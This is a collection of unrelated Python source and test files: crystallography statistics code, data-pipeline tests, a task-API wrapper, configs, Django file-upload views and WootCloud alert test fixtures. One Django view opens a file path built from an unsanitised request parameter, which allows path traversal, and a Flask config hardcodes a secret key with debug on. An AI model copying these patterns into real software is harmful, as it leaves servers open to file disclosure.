"R-work (after cutoff)", "R-free (after cutoff)",
"Completeness in range", "Completeness", "Completeness to 6A",
"Average B", "Minimum B", "Maximum B",
"Wilson B", "Solvent content",
"RMSD(bonds)", "Bonds max.", "RMSD(angles)", "Angles max.",
"RMSD(dihedrals)", "Dihedrals max.", "RMSD(planarity)", "Planarity max",
"RMSD(chirality)", "Chirality max.",
"Ramachandran favored", "Ramachandran allowed", "Ramachandran outliers",
"Rotamer outliers", "Clashscore"]
other_captions = ["High resolution", "Low resolution",
"Min. backbone ADP", "Min. sidechain ADP", "Min. solvent ADP",
"Max. backbone ADP", "Max. sidechain ADP", "Max. solvent ADP",
"Mean backbone ADP", "Mean sidechain ADP", "Mean solvent ADP",
"Unit cell volume"]
assert len(keys_to_show) == len(key_captions)
_selected = []
for key_name in keys_to_show :
if key_name in default_keys :
_selected.append("*%s" % key_name)
else :
_selected.append(key_name)
key_params_str = " ".join(_selected)
captions_str = " ".join([ re.sub(" ", "_", txt) for txt in key_captions ])
polygon_params_str = """\
database_file_name = None
.type = str
.style = noauto
keys_to_show = %s
.type = choice(multi=True)
.short_caption = Statistics to display
.caption = %s
.style = bold hide_label
number_of_histogram_slots = 10
.type = int
.help = Number of histogram slots for the final histogram to be used to \
draw the POLYGON's rays.
.input_size = 64
.style = noauto bold
""" % (key_params_str, captions_str)
all_params_str = """
polygon {
%s
}""" % polygon_params_str
master_params = iotbx.phil.parse(all_params_str)
def select_dict(database_dict, selection):
result = {}
for key in database_dict.keys():
result.setdefault(key, database_dict[key].select(selection))
return result
def filter_and_convert(database_dict, keys):
selection = flex.bool(database_dict[keys[0]].size(), True)
for key in keys+["high_resolution"]:
values = database_dict[key]
selection &= (values != "none")
tmp = select_dict(database_dict = database_dict, selection = selection)
result = {}
for key in keys+["high_resolution"]:
vals = flex.double([float(v) for v in tmp[key]])
result.setdefault(key, vals)
return result
def show_histogram(data, n_slots, smooth = True):
triplets = []
histogram = flex.histogram(data = data, n_slots = n_slots)
l = histogram.data_min()
for i, s in enumerate(histogram.slots()):
r = histogram.data_min() + histogram.slot_width() * (i+1)
triplets.append( [l, r, s] )
print("%8.4f %8.4f %d" % (l, r, s))
l = r
if(smooth):
print("... smooth histogram")
triplets_smooth = []
for i, t in enumerate(triplets):
values = flex.double()
for j in [-1,0,1]:
if(i+j >=0 and i+j < len(triplets)):
values.append(float(triplets[i+j][2]))
triplets_smooth.append((t[0],t[1],flex.mean(values)))
for t in triplets_smooth:
print("%8.4f %8.4f %d" % (t[0], t[1], int("%.0f"%t[2])))
return histogram
def convert_to_histogram(data, n_slots):
histogram = flex.histogram(data=data, n_slots=n_slots)
return histogram
def apply_default_filter(database_dict, d_min, key = "high_resolution"):
d_mins = database_dict["high_resolution"]
offset = 0.1
if(d_min>=3 and d_min<4): offset = 0.2
if(d_min>=4 and d_min<6): offset = 0.5
if(d_min>=6): offset = 1.0
sel = (d_mins>(d_min-offset))
sel &= (d_mins<(d_min+offset))
result = select_dict(database_dict = database_dict, selection = sel)
# Totally ad-hoc manipulation for histograms to make sense and format nicely.
# Perhaps needs to be revised at some point.
sel = flex.bool(sel.count(True), True)
for key in result.keys():
if(key in ["high_resolution"]): continue
vals = result[key]
if(key == "bond_rmsd"):
sel &= vals < 0.05
elif(key == "angle_rmsd"):
sel &= vals < 5.
else:
mean = flex.mean(vals)
sel &= vals > mean/2
sel &= vals < mean*2
if(key == "r_work" or key == "r_free"):
sel &= vals < 0.45
result = select_dict(database_dict=result, selection=sel)
#
return result
def load_db(file_name=None):
if(file_name is None):
file_name = libtbx.env.find_in_repositories(
relative_path = "chem_data/polygon_data/all_mvd.pickle",
test = os.path.isfile)
assert os.path.isfile(file_name)
database_dict = easy_pickle.load(file_name)
# Python 3 pickle fix
# =========================================================================
if sys.version_info.major == 3:
database_dict = easy_pickle.fix_py2_pickle(database_dict)
# =========================================================================
return database_dict
def polygon(params = master_params.extract(), d_min = None,
show_histograms = True, extract_gui_data=False):
database_dict = load_db(file_name=params.polygon.database_file_name)
result = filter_and_convert(
database_dict = database_dict,
keys = params.polygon.keys_to_show)
if(d_min is not None):
result = apply_default_filter(database_dict = result, d_min = d_min)
histograms = []
if extract_gui_data :
for selected_key in params.polygon.keys_to_show:
data = result[selected_key]
histograms.append([selected_key, data]) # XXX: not really histograms!
elif(show_histograms):
for selected_key in params.polygon.keys_to_show:
data = result[selected_key]
print("%s data_points=%d" % (selected_key, data.size()), \
"min/max/mean= %12.4f %12.4f %12.4f"%data.min_max_mean().as_tuple())
n_slots = params.polygon.number_of_histogram_slots
if(n_slots is None):
assert 0
n_slots = data.size()//50
if(n_slots < 5):
for scale in range(25,10,-1):
n_slots = data.size()//scale
if(n_slots >= 10): break
if(n_slots == 0):
raise Sorry("Not enough data selected.")
h = show_histogram(data = data, n_slots = n_slots)
histograms.append([selected_key,h])
return histograms
def get_statistics_percentiles(d_min, stats):
"""
For a given set of statistics, determine their percentile ranking compared
to other crystal structures at similar resolution.
"""
if (d_min is None):
return dict([ (s, None) for s in stats.keys() ])
try :
db = load_db()
except Exception as e :
return {}
d_min_mvd = flex.double([ float(x) for x in db['high_resolution'] ])
sel_perm = flex.sort_permutation(d_min_mvd)
d_min_mvd = d_min_mvd.select(sel_perm)
def find_value_in_list(values, value):
i = 0
j = len(values) - 1
while (i != j):
k = i + (j - i) // 2
if (value and value <= values[k]):
j = k
else :
i = k + 1
return i
index = find_value_in_list(d_min_mvd, d_min)
sel_around = flex.bool(d_min_mvd.size(), False)
index_tmp = index
while (index_tmp > 0):
d_min_other = d_min_mvd[index_tmp]
if (d_min_other < d_min - 0.1):
break
sel_around[index_tmp] = True
index_tmp -= 1
index_tmp = index
while (index_tmp < d_min_mvd.size()):
d_min_other = d_min_mvd[index_tmp]
if (d_min_other > d_min + 0.1):
break
sel_around[index_tmp] = True
index_tmp += 1
#print "%d structures around %g" % (sel_around.count(True), d_min)
percentiles = {}
for stat_name in stats.keys():
stat = stats[stat_name]
if (not stat_name in db):
percentiles[stat_name] = None
continue
values = db[stat_name].select(sel_perm).select(sel_around)
fvalues = flex.double()
for value in values :
try :
fvalues.append(float(value))
except ValueError :
pass
assert fvalues.size() != 0
fvalues_sorted = fvalues.select(flex.sort_permutation(fvalues))
stat_index = find_value_in_list(fvalues_sorted, stat)
# FIXME I think for some of these statistics we need to reverse this -
# i.e. if higher statistics are better
stat_perc = 100 * (1 - (stat_index / fvalues.size()))
percentiles[stat_name] = stat_perc
#print stat_name, stat_index, fvalues.size(), stat_perc
#flex.histogram(fvalues, n_slots=10).show(prefix=" ")
return percentiles
|
11481563
|
import sys, os.path as path
sys.path.append(path.dirname(path.dirname(path.abspath(__file__))))
PROJECT_PATH = path.dirname(path.dirname(path.abspath(__file__)))
from summariser.data_processer.corpus_cleaner import CorpusCleaner
def main():
corpus_name = 'DUC2004' # DUC2001, DUC2002, DUC2004
parse_type = 'parse'
language = 'english'
data_path = path.join(PROJECT_PATH, "../data")
if parse_type !=None and language==None:
raise AttributeError('Please specify language')
corpus = CorpusCleaner(data_path, corpus_name, parse_type, language)
if corpus_name[:3] == 'DUC' or corpus_name[:3] == 'TAC':
corpus.cleanDuc_data(parse_type)
if corpus_name[:3] == 'DBS':
corpus.cleanDBS_data(parse_type)
if corpus_name == 'WikiAIPHES':
corpus.cleanWiki_data(parse_type)
else:
pass
if __name__ == '__main__':
main()
|
11481599
|
import unittest
from mock import Mock, patch, ANY
from pandas import DataFrame
from records_mover.records.schema import RecordsSchema
class TestRecordsSchema(unittest.TestCase):
maxDiff = None
@patch('records_mover.records.schema.schema.sqlalchemy.RecordsSchemaField')
@patch('records_mover.records.schema.schema.sqlalchemy.RecordsSchemaKnownRepresentation')
def test_from_db_table(self,
mock_RecordsSchemaKnownRepresentation,
mock_RecordsSchemaField):
mock_schema_name = Mock(name='schema_name')
mock_table_name = Mock(name='table_name')
mock_driver = Mock(name='driver')
mock_column = Mock(name='column')
mock_table = mock_driver.table.return_value
mock_table.columns = [mock_column]
mock_origin_representation =\
mock_RecordsSchemaKnownRepresentation.from_db_driver.return_value
mock_known_representations = {
'origin': mock_origin_representation,
}
mock_field = mock_RecordsSchemaField.from_sqlalchemy_column.return_value
actual_schema = RecordsSchema.from_db_table(schema_name=mock_schema_name,
table_name=mock_table_name,
driver=mock_driver)
mock_driver.table.assert_called_with(mock_schema_name, mock_table_name)
mock_RecordsSchemaKnownRepresentation.from_db_driver.assert_called_with(mock_driver,
mock_schema_name,
mock_table_name)
mock_RecordsSchemaField.\
from_sqlalchemy_column.assert_called_with(column=mock_column,
driver=mock_driver,
rep_type=mock_origin_representation.type)
self.assertEqual(actual_schema.fields, [mock_field])
self.assertEqual(actual_schema.known_representations,
mock_known_representations)
def test_str(self):
obj = RecordsSchema(fields=[],
known_representations={})
self.assertEqual(str(obj), "RecordsSchema(types={})")
@patch('records_mover.records.schema.schema.sqlalchemy.schema_to_schema_sql')
def test_to_schema_sql(self, mock_schema_to_schema_sql):
mock_driver = Mock(name='driver')
mock_schema_name = Mock(name='schema_name')
mock_table_name = Mock(name='table_name')
obj = RecordsSchema(fields=[],
known_representations={})
out = obj.to_schema_sql(mock_driver,
mock_schema_name,
mock_table_name)
mock_schema_to_schema_sql.assert_called_with(driver=mock_driver,
records_schema=obj,
schema_name=mock_schema_name,
table_name=mock_table_name)
self.assertEqual(out, mock_schema_to_schema_sql.return_value)
@patch('records_mover.records.schema.schema.RecordsSchema')
@patch('records_mover.records.delimited.stream_csv')
def test_from_fileobjs(self,
mock_stream_csv,
mock_RecordsSchema):
mock_fileobj = Mock(name='fileobj')
mock_fileobjs = [mock_fileobj]
mock_records_format = Mock(name='records_format')
mock_processing_instructions = Mock(name='processing_instructions')
mock_fileobj.seekable.return_value = True
mock_reader = mock_stream_csv.return_value.__enter__.return_value
data = [
{'Country': 'Belgium', 'Capital': 'Brussels', 'Population': 11190846,
'Unnamed: 1': None},
{'Country': 'India', 'Capital': 'New Delhi', 'Population': 1303171035,
'Unnamed: 1': None},
{'Country': 'Brazil', 'Capital': 'Brasília', 'Population': 207847528,
'Unnamed: 1': None},
]
df = DataFrame.from_dict(data)
mock_reader.get_chunk.return_value = df
out = RecordsSchema.from_fileobjs(mock_fileobjs,
mock_records_format,
mock_processing_instructions)
mock_reader.get_chunk.assert_called_with(mock_processing_instructions.max_inference_rows)
mock_fileobj.seek.assert_called_with(0)
mock_RecordsSchema.from_dataframe.assert_called_with(ANY,
mock_processing_instructions,
include_index=False)
actual_cleaned_up_df = mock_RecordsSchema.from_dataframe.mock_calls[0][1][0]
actual_cleaned_up_df_data = actual_cleaned_up_df.to_dict(orient='records')
expected_cleaned_up_df_data = [
{'Country': 'Belgium', 'Capital': 'Brussels', 'Population': 11190846},
{'Country': 'India', 'Capital': 'New Delhi', 'Population': 1303171035},
{'Country': 'Brazil', 'Capital': 'Brasília', 'Population': 207847528},
]
self.assertEqual(actual_cleaned_up_df_data, expected_cleaned_up_df_data)
self.assertEqual(out,
mock_RecordsSchema.from_dataframe.return_value.
refine_from_dataframe.return_value)
@patch('records_mover.records.schema.schema.RecordsSchema')
@patch('records_mover.records.delimited.stream_csv')
def test_from_fileobjs_no_max_inference_rows(self,
mock_stream_csv,
mock_RecordsSchema):
mock_fileobj = Mock(name='fileobj')
mock_fileobjs = [mock_fileobj]
mock_records_format = Mock(name='records_format')
mock_processing_instructions = Mock(name='processing_instructions')
mock_processing_instructions.max_inference_rows = None
mock_fileobj.seekable.return_value = True
mock_reader = mock_stream_csv.return_value.__enter__.return_value
data = [
{'Country': 'Belgium', 'Capital': 'Brussels', 'Population': 11190846,
'Unnamed: 1': None},
{'Country': 'India', 'Capital': 'New Delhi', 'Population': 1303171035,
'Unnamed: 1': None},
{'Country': 'Brazil', 'Capital': 'Brasília', 'Population': 207847528,
'Unnamed: 1': None},
]
df = DataFrame.from_dict(data)
mock_reader.read.return_value = df
out = RecordsSchema.from_fileobjs(mock_fileobjs,
mock_records_format,
mock_processing_instructions)
mock_fileobj.seek.assert_called_with(0)
mock_RecordsSchema.from_dataframe.assert_called_with(ANY,
mock_processing_instructions,
include_index=False)
actual_cleaned_up_df = mock_RecordsSchema.from_dataframe.mock_calls[0][1][0]
actual_cleaned_up_df_data = actual_cleaned_up_df.to_dict(orient='records')
expected_cleaned_up_df_data = [
{'Country': 'Belgium', 'Capital': 'Brussels', 'Population': 11190846},
{'Country': 'India', 'Capital': 'New Delhi', 'Population': 1303171035},
{'Country': 'Brazil', 'Capital': 'Brasília', 'Population': 207847528},
]
self.assertEqual(actual_cleaned_up_df_data, expected_cleaned_up_df_data)
self.assertEqual(out,
mock_RecordsSchema.from_dataframe.return_value.
refine_from_dataframe.return_value)
@patch('records_mover.records.schema.schema.pandas.refine_schema_from_dataframe')
def test_refine_from_dataframe(self,
mock_refine_schema_from_dataframe):
mock_fields = Mock(name='fields')
mock_known_representations = Mock(name='known_representations')
schema = RecordsSchema(fields=mock_fields,
known_representations=mock_known_representations)
mock_df = Mock(name='df')
mock_processing_instructions = Mock(name='processing_instructions')
out = schema.refine_from_dataframe(mock_df, mock_processing_instructions)
mock_refine_schema_from_dataframe.\
assert_called_with(records_schema=schema,
df=mock_df,
processing_instructions=mock_processing_instructions)
self.assertEqual(out, mock_refine_schema_from_dataframe.return_value)
def test_cast_dataframe_types(self):
mock_field_a = Mock(name='field_a')
mock_fields = [mock_field_a]
mock_known_representations = Mock(name='known_representations')
schema = RecordsSchema(fields=mock_fields,
known_representations=mock_known_representations)
mock_df = Mock(name='df')
out = schema.cast_dataframe_types(mock_df)
mock_df.apply.assert_called()
self.assertEqual(out, mock_df.apply.return_value)
def test_cast_dataframe_types_no_fields(self):
mock_fields = []
mock_known_representations = Mock(name='known_representations')
schema = RecordsSchema(fields=mock_fields,
known_representations=mock_known_representations)
mock_df = Mock(name='df')
out = schema.cast_dataframe_types(mock_df)
self.assertEqual(out, mock_df.apply.return_value)
def test_assign_dataframe_names_no_index(self):
data = [{'a': 1}]
df = DataFrame.from_dict(data)
mock_field_a = Mock(name='field_a')
mock_field_a.name = 'mya'
mock_fields = [mock_field_a]
mock_known_representations = Mock(name='known_representations')
schema = RecordsSchema(fields=mock_fields,
known_representations=mock_known_representations)
out = schema.assign_dataframe_names(False, df)
self.assertEqual(out.to_dict(orient='records'), [{'mya': 1}])
def test_assign_dataframe_names_with_index(self):
data = [{'b': 1}]
df = DataFrame.from_dict(data)
self.assertEqual(df.to_dict(orient='index'), {0: {'b': 1}})
mock_field_a = Mock(name='field_a')
mock_field_a.name = 'mya'
mock_field_b = Mock(name='field_b')
mock_field_b.name = 'myb'
mock_fields = [mock_field_a, mock_field_b]
mock_known_representations = Mock(name='known_representations')
schema = RecordsSchema(fields=mock_fields,
known_representations=mock_known_representations)
out = schema.assign_dataframe_names(True, df)
self.assertEqual(out.to_dict(orient='records'), [{'myb': 1}])
self.assertEqual(out.to_dict(orient='index'), {'mya': {'myb': 1}})
|
11481621
|
from __future__ import absolute_import
import re
from contextlib import contextmanager
import gtasks.timeconversion as tc
from gtasks.gtaskobject import GtaskObject
from gtasks.misc import raise_for_type
from gtasks.tasklist import TaskList
class Task(GtaskObject):
LIST_REGEX = re.compile('lists/(\w+)/tasks')
def __init__(self, task_dict, gtasks):
GtaskObject.__init__(self, task_dict, gtasks)
list_id = Task.LIST_REGEX.search(task_dict['selfLink']).group(1)
if list_id in gtasks._list_index:
self.task_list = gtasks._list_index[list_id]
else:
list_dict = {'id': list_id, 'selfLink': gtasks.LISTS_URL+'/'+list_id}
self.task_list = TaskList(list_dict, gtasks)
task_id = task_dict['id']
self.task_list._task_index[task_id] = self
gtasks._task_index[task_id] = self
self._parent_settings = self.task_list
self._update_params = {'task': task_id, 'tasklist': list_id}
def unhide(self):
self._set_property('hidden', False)
@contextmanager
def batch_edit(self):
old_value = self._auto_push
self._auto_push = False
yield
self.push_updates()
self._auto_push = old_value
# hidden property (read-only)
@property
def hidden(self):
return self._get_property('hidden') is True
# notes property
@property
def notes(self):
return self._get_property('notes')
@notes.setter
def notes(self, value):
self._set_property('notes', value, str)
# complete property
@property
def complete(self):
return self._get_property('status') == 'completed'
@complete.setter
def complete(self, value):
raise_for_type(value, bool)
if value:
self._set_property('status', 'completed')
else:
self._set_property('completed', None, push_override=False)
self._set_property('status', 'needsAction')
# due_date property
@property
def due_date(self):
date = self._get_property('due')
if date is not None:
date = tc.from_date_rfc3339(date)
return date
@due_date.setter
def due_date(self, value):
if value is None:
self._set_property('due', None)
else:
self._set_property('due', tc.to_date_rfc3339(value))
# completion_date property
@property
def completion_date(self):
date = self._get_property('completed')
if date is not None:
date = tc.from_rfc3339(date)
return date
@completion_date.setter
def completion_date(self, value):
if value is None:
self._set_property('status', 'needsAction', push_override=False)
self._set_property('completed', None)
else:
self._set_property('status', 'completed', push_override=False)
self._set_property('completed', tc.to_rfc3339(value))
# deleted property
@property
def deleted(self):
return self._get_property('deleted') is True
@deleted.setter
def deleted(self, value):
self._set_property('deleted', value, bool)
# parent proprty
@property
def parent(self):
parent_id = self._get_property('parent')
if parent_id:
return self._gtasks.get_task(parent_id)
else:
return None
def __unicode__(self):
mark = u'\u2713' if self.complete else u' ' # u2713 is a checkmark
return u'({}) {}'.format(mark, self.title)
|
11481642
|
import unittest
from three_words import checkio
class Tests(unittest.TestCase):
TESTS = {
"Basics": [
{"input": "Hello World hello", "answer": True},
{"input": "He is 123 man", "answer": False},
{"input": "1 2 3 4", "answer": False},
{"input": "bla bla bla bla", "answer": True},
{"input": "Hi", "answer": False},
],
"Extra": [
{
"input": "one two 3 four five 6 seven eight 9 ten eleven 12",
"answer": False,
},
{"input": "one two 3 four 5 six 7 eight 9 ten eleven 12", "answer": False},
{
"input": "one two 3 four five six 7 eight 9 ten eleven 12",
"answer": True,
},
{"input": "1231 321 3123 12312 3231 321 312 3123 1231", "answer": False},
{"input": "sda das das dsa adfs dfasd fas", "answer": True},
{"input": "0 qwerty iddqd asdfg ", "answer": True},
{"input": "0 qwerty a asdfg 2", "answer": True},
{"input": "0 qwerty 99999999999 asdfg 2", "answer": False},
{"input": "qwe fds 32 khh wwewe 123 uiu 8794", "answer": False},
],
}
def test_Basics(self):
for i in self.TESTS['Basics']:
assert checkio(i['input']) == i['answer'], i['input']
def test_Extra(self):
for i in self.TESTS['Extra']:
assert checkio(i['input']) == i['answer'], i['input']
if __name__ == "__main__": # pragma: no cover
unittest.main()
|
11481696
|
from os import path
# App details
BASE_DIRECTORY = path.abspath(path.dirname(__file__))
DEBUG = True
SECRET_KEY = 'keep_it_like_a_secret'
# Database details
SQLALCHEMY_DATABASE_URI = '{0}{1}'.format('sqlite:///',
path.join(BASE_DIRECTORY, 'app.db'))
|
11481716
|
import contextlib
import cProfile
import io
import pstats
from collections import MutableMapping
from functools import wraps
from typing import Any, Callable, Dict
def suppress_print(func: Callable) -> Callable:
"""
Function decorator to suppress print output for testing purposes.
If ``suppress_print: False`` is part of the ``**kwargs`` of the
wrapped method the output won't be suppressed.
"""
@wraps(func)
def wrapped(*args: Any, **kwargs: Any) -> Any:
if not kwargs.pop("suppress_print", True):
return func(*args, **kwargs)
trap = io.StringIO()
with contextlib.redirect_stdout(trap), contextlib.redirect_stderr(trap):
result = func(*args, **kwargs)
return result
return wrapped
def merge_dicts(d1: Dict, d2: Dict) -> Dict:
"""
Update two dicts of dicts recursively, if either mapping has leaves
that are non-dicts, the second's leaf overwrites the first's.
Taken from: https://stackoverflow.com/a/24088493/3511979
"""
for k, v in d1.items():
if k in d2:
if all(isinstance(e, MutableMapping) for e in (v, d2[k])):
d2[k] = merge_dicts(v, d2[k])
d3 = d1.copy()
d3.update(d2)
return d3
@contextlib.contextmanager
def profile() -> None:
"""
Profiler that operates as a context manager. Example usage:
.. code-block:: python
with profile():
foo()
bar()
"""
pr = cProfile.Profile()
pr.enable()
yield
pr.disable()
pstats.Stats(pr).sort_stats("cumulative").print_stats()
|
11481719
|
from hubcommander.auth_plugins.enabled_plugins import AUTH_PLUGINS
# Define the organizations that this Bot will examine.
ORGS = {
"Real_Org_Name_here": {
"aliases": [
"some_alias_for_your_org_here"
],
"public_only": False, # False means that your org supports Private repos, True otherwise.
"new_repo_teams": [ # This is a list, so add all the teams you want to here...
{
"id": "0000000", # The team ID for the team that you want new repos to be attached to
"perm": "push", # The permission, either "push", "pull", or "admin"...
"name": "TeamName" # The name of the team here...
}
]
}
}
# github API Version
GITHUB_VERSION = "application/vnd.github.v3+json" # Is this still needed?
# GITHUB API PATH:
GITHUB_URL = "https://api.github.com/"
# You can use this to add/replace fields from the command_plugins dictionary:
USER_COMMAND_DICT = {
# This is an example for enabling Duo 2FA support for the "!SetDefaultBranch" command:
# "!SetDefaultBranch": {
# "auth": {
# "plugin": AUTH_PLUGINS["duo"],
# "kwargs": {}
# }
#}
}
|
11481783
|
import hashlib
import os
from django.shortcuts import render, redirect
from django.contrib import messages, auth
from django.contrib.auth.decorators import login_required
from django.core.files.storage import FileSystemStorage
from users.forms import RegistrationForm, TeamRegistrationForm
from users.models import File, FileGroup, Member, Team
def fhandler(request, name):
path = "/".join(os.path.dirname(os.path.realpath(__file__)).split("/")[:-1])
new_path = path + "/media/" + name
with open(new_path, "rb") as f:
text = f.read()
print(text)
return render(
request, "users/file.html", {"text": text.decode("utf-8"), "name": name}
)
def index(request):
return render(request, "users/index.html")
def register(request):
if request.method == "POST":
form = RegistrationForm(request.POST)
if form.is_valid():
form.save()
print(form.save())
messages.success(request, "You have been successfully registered!")
return redirect("login")
else:
form = RegistrationForm()
return render(request, "users/register.html", {"form": form})
@login_required(login_url="/login/")
def teamregister(request):
if request.method == "POST":
form = TeamRegistrationForm(request.POST)
if form.is_valid():
form.save()
form.instance.members.add(request.user)
print(form.save())
messages.success(request, "Your team has been successfully registered!")
return redirect("dashboard")
else:
form = TeamRegistrationForm()
return render(request, "users/team_create.html", {"form": form})
@login_required(login_url="/login/")
def teamjoin(request):
if request.method == "POST":
teamname = request.POST["teamname"]
password = request.POST["password"]
team_qs = Team.objects.filter(name=teamname, password=password)
if team_qs: # if query set exists, add logged in user to the team
team = team_qs[0]
team.members.add(request.user)
messages.success(
request, f"You have been successfully added to {team.name}!"
)
return redirect("dashboard")
else:
messages.error(
request,
"Unable to add you to team! Please recheck team name and password",
)
return render(request, "users/team_join.html")
def login(request):
if request.method == "POST":
username = request.POST["username"]
password = request.POST["password"]
user = auth.authenticate(username=username, password=password)
if user:
auth.login(request, user)
messages.success(request, "You have successfully logged in")
return redirect("dashboard")
else:
messages.error(request, "Invalid Credentials")
return redirect("login")
return render(request, "users/login.html")
@login_required(login_url="/login/")
def upload(request):
context = {}
if request.method == "POST":
uploaded_file = request.FILES["document"]
if not check_title_presence(uploaded_file):
messages.success(request, "New file save successfully.")
path = save_on_server(uploaded_file)
hash_val = hash_file(path)
form = File(title=uploaded_file.name, hash_val=hash_val, user=request.user)
form.save()
file_group_form = FileGroup(title=uploaded_file.name, user=request.user)
file_group_form.save()
file_group_form.files.add(form)
else:
# flash message that A similar file is already present if hash value matches
path = save_on_server(uploaded_file)
hash_val = hash_file(path)
if check_file_presence(hash_val):
messages.warning(request, "A similar file is already present")
os.remove(path)
# hash value matches so no need to upload. if not, upload it with different file name
else:
file_group = FileGroup.objects.filter(title=uploaded_file.name)[0]
# save file on server with new name{version}
title = path.split("/")[-1]
form = File(title=title, hash_val=hash_val, user=request.user)
form.save()
file_group.files.add(
form
) # adds newly created file version to file group
messages.warning(
request,
"file with same name is already present adding it with new version ",
)
return render(request, "users/upload.html", context)
@login_required(login_url="/login/")
def dashboard(request):
teams = Member.objects.filter(user__id__in=[request.user.id])
context = {}
files = FileGroup.objects.filter(user__id__in=[request.user.id])
context = {"files": files, "teams": teams}
print(context["teams"])
return render(request, "users/dashboard.html", context)
def logout(request):
auth.logout(request)
messages.success(request, "You have been logged out")
return render(request, "users/logout.html")
def hash_file(filename):
""""This function returns the SHA-1 hash
of the file passed into it"""
# make a hash object
h = hashlib.sha1()
with open(filename, "rb") as file:
# loop till the end of the file
chunk = 0
while chunk != b"":
# read only 1024 bytes at a time
chunk = file.read(1024)
h.update(chunk)
# return the hex representation of digest
return h.hexdigest()
def check_title_presence(uploaded_file):
"""
query database for filename and if it is present then return True else return False
"""
file = File.objects.filter(title=uploaded_file)
if file:
return True
return False
def check_file_presence(hash_val):
"""
checks if a file exists with the same hash value
"""
file = File.objects.filter(hash_val=hash_val)
if file:
return True
return False
def save_on_server(uploaded_file):
"""
this method saves the file, using a new unique name if already present
"""
fs = FileSystemStorage()
name = fs.save(uploaded_file.name, uploaded_file)
url = fs.url(name)
path = "/".join(os.path.dirname(os.path.realpath(__file__)).split("/")[:-1])
return path + url
|
11481826
|
from pathlib import Path
from lightflow.workflows import list_workflows
from lightflow.config import Config
def test_list_workflows_when_no_workflow_dirs_in_config():
config = Config()
config.load_from_dict({'workflows': []})
assert list_workflows(config) == []
def test_list_workflows_handles_missing_parameters():
config = Config()
workflows_path = str(Path(__file__).parent / 'fixtures/workflows')
config.load_from_dict({'workflows': [workflows_path]})
assert 'parameters_workflow' in {wf.name for wf in list_workflows(config)}
|
11481829
|
from django.contrib import admin
from .models.team import CoreTeam, ProjectTeam, Team
from .models.team_member import CoreMember, ProjectMember, TeamMember
admin.site.register(CoreTeam)
admin.site.register(ProjectTeam)
admin.site.register(Team)
admin.site.register(CoreMember)
admin.site.register(ProjectMember)
admin.site.register(TeamMember)
|
11481881
|
from WootCloud import fetch_incidents, Client, fetch_single_alert
MOCK_URL = 'https://api_mock.wootcloud.com'
MOCK_START = '2019-06-25T08:00:00Z'
MOCK_END = '2019-06-27T08:00:00Z'
MOCK_HEADERS = {
'Content-Type': 'application/json',
'Accept': 'application/json',
'Host': 'api.wootuno.wootcloud.com'
}
MOCK_PKT_ALERT = {
"id": "eyJpIjoiU05XT09UQVBQUFJPRDAxXzEzMzIxNThfMDAwIiwidCI6IjIwMTktMDYtMjZUMjA6MjQ6MjZaIn0=",
"timestamp": "2019-06-26T20:24:26Z",
"severity": "warning",
"category": "Adminstrator Privilege gain attempted",
"signature": "ET POLICY IP Check Domain (whatismyip in HTTP Host)",
"source": {
"city": "Unknown",
"continent": "Unknown",
"country": "Unknown",
"ip": "192.168.1.193",
"latitude": -1,
"longitude": -1,
"mac": "cc:cc:cc:bc:7c:01",
"network": "internal",
"port": 61079,
"state": "Unknown",
"subnet": "192.168.1.0/24",
"time_zone": "Unknown",
"zip": "Unknown",
"inferred": {
"device_id": "5b4c3c91072c98142d308c31",
"asset": "managed",
"managed": "true",
"category": "mobile_phone",
"control": "user",
"host_name": "Shahabs-iPhone",
"os": "ios",
"os_version": "12.1.4",
"ownership": "corporate",
"total_risk": 18.188051551163394,
"type": "smart phone",
"username": "",
"managed_info": {
"host_name": "Shahabs-iPhone"
}
}
},
"destination": {
"city": "Cambridge",
"continent": "North America",
"country": "United States",
"ip": "192.168.1.22",
"latitude": 42.3626,
"longitude": -71.0843,
"mac": "cc:cc:cc:cc:c3:c0",
"network": "external",
"port": 80,
"state": "Massachusetts",
"subnet": "",
"time_zone": "America/New_York",
"zip": "02142",
"inferred": {
"device_id": "",
"asset": "unmanaged",
"managed": "false",
"category": "",
"control": "",
"host_name": "",
"os": "",
"os_version": "",
"ownership": "",
"total_risk": 0,
"type": "",
"username": "",
"managed_info": {
"host_name": ""
}
}
},
"payload": ""
}
ANOMALY_ALERT = {
"id": "eyJpIjoibWxub2RlX3AwMDhfY2F0LGY4OjJkOjdjOjJmOjQzOjdjLHVua==",
"timestamp": "2019-05-02T08:00:00Z",
"anomaly_type": "bytes_received",
"signature": "60 (minutes) 'bytes_received'",
"description": "Anomaly: 60 minutes unknown-protocol was significantly more than average during this time",
"severity": "warning",
"count": 1,
"average": 0,
"minimum": 0,
"maximum": 0,
"standard_deviation": 0,
"anomaly_score": 1,
"observed_value": 805,
"deviation_from_norm": "8050.0",
"units": "bytes",
"address": "f8:2d:7c:2f:43:7c",
"device_details": {
"device_id": "5cc31d4b954fbc0e96c84eff",
"asset": "unmanaged",
"managed": "false",
"category": "mobile_phone",
"control": "user",
"host_name": "iPhone",
"os": "ios",
"os_version": "",
"ownership": "employee-owned",
"total_risk": 0.008771929824570352,
"type": "smart phone",
"username": "",
"managed_info": {
"host_name": ""
},
"ip": "",
"network": ""
}
}
FETCH_ALERTS = {
"total": 199,
"packet_alerts": [
{
"id": "<KEY>
"address": "7c:67:a2:37:77:51",
"timestamp": "2020-03-14T03:00:27Z",
"severity": "info",
"category": "User Activity Detected",
"signature": "ET POLICY Dropbox.com Offsite File Backup in Use",
"source": {
"city": "San Francisco",
"continent": "North America",
"country": "United States",
"ip": "4.4.4.4",
"latitude": 37.7697,
"longitude": -122.3933,
"mac": "c4:24:56:87:ef:11",
"network": "external",
"port": 443,
"state": "California",
"subnet": "",
"time_zone": "America/Los_Angeles",
"zip": "94107",
"inferred": {
"device_id": "",
"asset": "unmanaged",
"managed": "false",
"category": "",
"control": "",
"host_name": "",
"os": "",
"os_version": "",
"ownership": "",
"total_risk": 0,
"type": "",
"username": "",
"managed_info": {
"host_name": ""
}
}
},
"destination": {
"city": "Unknown",
"continent": "Unknown",
"country": "Unknown",
"ip": "2.2.2.2",
"latitude": -1,
"longitude": -1,
"mac": "7c:67:a2:37:77:51",
"network": "internal",
"port": 54250,
"state": "Unknown",
"subnet": "10.10.10.10/24",
"time_zone": "Unknown",
"zip": "Unknown",
"inferred": {
"device_id": "5b589f43e4b58d191f7e017c",
"asset": "managed",
"managed": "true",
"category": "computer",
"control": "user",
"host_name": "DESKTOP-73OV7ML",
"os": "windows",
"os_version": "10",
"ownership": "corporate",
"total_risk": 11.9,
"type": "computer",
"username": "7c67a2377751",
